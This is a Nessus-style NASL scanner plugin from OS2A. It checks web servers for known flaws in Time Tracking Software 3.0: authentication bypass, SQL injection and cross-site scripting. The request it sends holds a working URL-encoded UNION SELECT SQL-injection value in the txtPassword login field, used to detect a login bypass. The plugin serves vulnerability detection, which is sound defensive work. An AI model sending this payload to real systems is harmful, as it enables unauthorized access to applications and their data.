##############################################################################
#
# Time Tracking Software Multiple Vulnerabilities
#
# Copyright: OS2A and its member companies
#
# Date Written: 2006/02/22
#
# $Revision: 1.1 $
#
# $Log: os2a_timetracking_multiple_vuln_601413.nasl,v $
# Revision 1.1  2006/02/23 12:11:39  shraddha
# To Production Issue #1934
#
# Revision 1.3  2006/02/23 04:39:22  hshreesha
# issue #1934
# formatting changes
#
# Revision 1.2  2006/02/22 08:32:03  drahul
# issue #1934
# script category modified
#
# Revision 1.1  2006/02/22 07:11:32  drahul
# issue #1934
#
#
# ------------------------------------------------------------------------
# This program was written by OS2A and/or its member companies and is
# licensed under the GNU GPL license. Please see below for details. This
# header contains information regarding licensing terms under the GPL, and
# information regarding obtaining source code from the Author. Consequently,
# pursuant to section 3(c) of the GPL, you must accompany the information
# found in this header with any distribution you make of this Program.
# ------------------------------------------------------------------------
##############################################################################

# Registration branch: the engine sets `description` when it only wants the
# plugin's metadata, so the network check further down never runs here.
if (description)
{
  script_id(601413);
  script_bugtraq_id(16731, 16630);
  script_cve_id("CVE-2006-0689", "CVE-2006-0690", "CVE-2006-0691");
  script_copyright(english:"Copyright (C) 2006 OS2A");
  script_version ("$Revision: 1.1 $");
  # ACT_ATTACK: the check below sends a crafted login, not a passive probe.
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");
  script_name(english:"Time Tracking Software Multiple Vulnerabilities");
  script_summary(english:"Check for Authentication Bypass Vulnerability in Time Tracking Software");

  desc["english"] = "
Overview :
  This host has Time Tracking Software, which is prone to SQL injection,
  cross-site scripting and other attacks.

Vulnerability Insight :
  - Missing credential validation in edituser.php can be exploited to
    modify the data of any users.
  - Input passed to txtPassword field in login.php is not properly
    sanitized before being used in a SQL query.
  - Input passed to the UserName field in the Registration Form is not
    properly sanitized before being saved.

Impact :
  This could allow the attacker to bypass authentication and gain
  unauthorized access to the application or add, modify, and delete
  information in the back-end database or may allow the attacker to
  steal the victim's cookie-based authentication credentials.
  Scope of impact is restricted to application level.

Affected Software :
  Time Tracking Software 3.0 and prior.

Affected Platform :
  Any system running the affected software.

Solution :
  Vendor has not yet released a patch/upgrade for this issue as of
  February 22, 2006. Information regarding this issue will be updated
  once the solution details are available.

References :
  http://www.evuln.com/vulns/69/description.html

CVSS Score :
  CVSS Base Score     : 7.0 (AV:R/AC:L/Au:NR/C:P/I:P/A:P/B:N)
  CVSS Temporal Score : 6.3

Risk factor : High";

  script_description(english:desc["english"]);
  script_dependencies("http_version.nasl");
  script_require_ports("Services/www", 80);
  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");

# Web port found by http_version.nasl; without one there is nothing to test.
port = get_http_port(default:80);
if (!port) exit(0);

# Walk the known CGI directories until a Time Tracking Software login page
# is found; only that one directory is tested, then the script ends.
foreach dir (make_list(cgi_dirs()))
{
  req = http_get(item:string(dir, "/login.php"), port:port);
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
  # A NULL reply means the web server stopped answering: stop altogether.
  if (res == NULL) exit(0);

  # Fingerprint the application by its calendar stylesheet and login prompt
  # before sending anything other than a plain GET.
  if (!("css/calendar.css" >< res && "Please enter your login details" >< res))
    continue;

  # txtPassword carries the SQL-injection value described in the plugin
  # description; the application is reported as vulnerable only when it
  # answers with a redirect into calendar.php, i.e. the login was bypassed.
  post = raw_string("txtUserName=test&txtPassword=%27+" +
                    "union+select+1%2C2%2C3%2C4%2C5%2C6%2C" +
                    "+7%2C8%2C9%2C10%2C11%2C+12%2C13%2F*" +
                    "&submit=Login");
  req = string("POST ", dir, "/login.php HTTP/1.1\r\n",
               "Host: ", get_host_name(), "\r\n",
               "Content-Type: application/x-www-form-urlencoded\r\n",
               "Content-Length:", strlen(post), "\r\n",
               "\r\n",
               post);
  res = http_keepalive_send_recv(port:port, data:req);
  if (res == NULL) exit(0);

  if (ereg(pattern:"^HTTP/.* 302 ", string:res) &&
      egrep(pattern:"(L|l)ocation:.*calendar.php", string:res))
  {
    security_hole(port);
  }
  exit(0);
}